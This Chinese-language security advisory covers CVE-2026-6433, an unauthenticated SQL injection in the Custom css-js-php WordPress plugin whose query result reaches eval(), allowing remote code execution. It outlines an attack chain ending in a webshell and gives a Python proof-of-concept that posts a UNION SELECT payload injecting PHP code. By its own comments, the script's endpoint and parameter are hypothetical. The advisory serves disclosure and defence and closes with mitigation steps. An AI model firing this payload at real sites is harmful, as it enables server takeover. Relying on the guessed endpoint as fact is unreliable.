CVE-2026-6433 WordPress插件远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-6433

漏洞类型

SQL注入导致远程代码执行

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Custom css-js-php WordPress Plugin

漏洞概述

CVE-2026-6433是WordPress插件Custom css-js-php中存在的严重安全漏洞。该插件在2.0.7及之前的版本中，未对用户提交的数据进行严格的过滤和清洗，直接将其用于SQL查询操作。更危险的是，程序将SQL查询的返回值传递给了eval()函数执行。这使得未经身份验证的远程攻击者可以通过构造特定的恶意SQL语句，控制eval()函数的执行内容，从而在服务器端执行任意PHP代码，获取服务器控制权。

技术细节

该漏洞的根本原因在于插件缺乏有效的输入验证机制以及不当使用了危险函数。具体而言，Custom css-js-php插件在处理特定API请求时，直接将用户可控的输入拼接到SQL查询语句中，未经过任何预处理或参数化查询，从而导致了SQL注入漏洞。更为严重的是，插件后端逻辑将此SQL查询获取到的结果直接作为参数传递给了PHP的eval()函数。eval()函数会将字符串当作PHP代码解析并执行，这意味着攻击者可以通过注入恶意SQL语句来控制传递给eval()的数据内容。一旦攻击者控制了这部分数据，便可以在服务器上下文中执行任意PHP代码，如读取敏感文件、安装后门或进一步提权。由于该漏洞无需认证且无需用户交互即可触发，极易被自动化扫描工具利用。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标WordPress站点，识别是否安装了Custom css-js-php插件及其版本号。

STEP 2

2. 漏洞利用

攻击者向插件接口发送特制的HTTP POST请求，请求中包含SQL注入Payload。

STEP 3

3. 数据操纵

由于插件未过滤输入，恶意SQL语句被执行，控制数据库查询结果，将其构造为恶意的PHP代码字符串。

STEP 4

4. 代码执行

插件将受污染的SQL查询结果传递给eval()函数，导致服务器端解析并执行攻击者注入的PHP代码。

STEP 5

5. 权限维持

攻击者利用执行权限写入Webshell或后门，实现对服务器的持久化控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url):
    """
    PoC for CVE-2026-6433
    Exploits SQL Injection leading to eval() RCE.
    Note: The specific endpoint parameter might vary based on plugin configuration.
    """
    # Hypothetical endpoint and parameter based on typical plugin structures
    full_url = f"{target_url}/wp-content/plugins/custom-css-js-php/public/index.php"
    
    # Payload attempts to inject PHP code into a SQL query result that is passed to eval()
    # Example: ' OR '1'='1' UNION SELECT 'system("id");' #
    # Assuming the vulnerable query selects a value that is then eval'd.
    payload_data = {
        "css_id": "1 UNION SELECT 'phpinfo();'-- -"
    }

    try:
        response = requests.post(full_url, data=payload_data, timeout=10)
        # Check if the output contains signs of phpinfo execution
        if "PHP Version" in response.text or "phpinfo()" in response.text:
            return "[+] Vulnerability confirmed: Remote Code Execution successful."
        else:
            return "[-] Target may not be vulnerable or payload incorrect."
    except Exception as e:
        return f"[!] Error occurred: {str(e)}"

if __name__ == "__main__":
    target = "http://example.com" # Replace with target
    print(check_vulnerability(target))

影响范围

Custom css-js-php <= 2.0.7

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Custom css-js-php插件以阻断攻击路径。同时，应通过服务器端的入侵检测系统监控针对该插件路径的异常流量。管理员还应检查服务器上是否存在可疑的新建文件，特别是Webshell文件，以确认是否已被入侵。